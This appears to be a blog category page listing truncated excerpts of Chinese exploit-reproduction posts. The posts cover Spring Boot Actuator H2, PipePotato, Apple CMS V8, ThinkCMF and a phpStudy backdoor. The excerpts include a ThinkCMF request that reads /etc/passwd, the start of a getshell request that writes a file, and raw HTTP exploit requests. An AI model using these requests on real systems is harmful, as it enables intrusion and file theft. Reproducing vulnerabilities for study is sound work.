未分类

Spring Boot Actuator H2 RCE复现

原文:https://www.cnblogs.com/cwkiller/p/12829974.html 前端时间碰到一个Actuator  信息泄露的然后复现了一下这个漏洞 git clone https://github.com/spaceraccoon/spring-boot-actu...

pipePotato 复现

原文  首发揭示!pipe土豆:一种新型的通用提权细分 传递了一个asp 的木马 执行权限为iis 运行e...

苹果CMS V8 绕过前台RCE

POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...

ThinkCMF RCE

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

phpStudy 隐藏web后门复现

GET / HTTP/1.1 Host: 192.168.1.16 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63....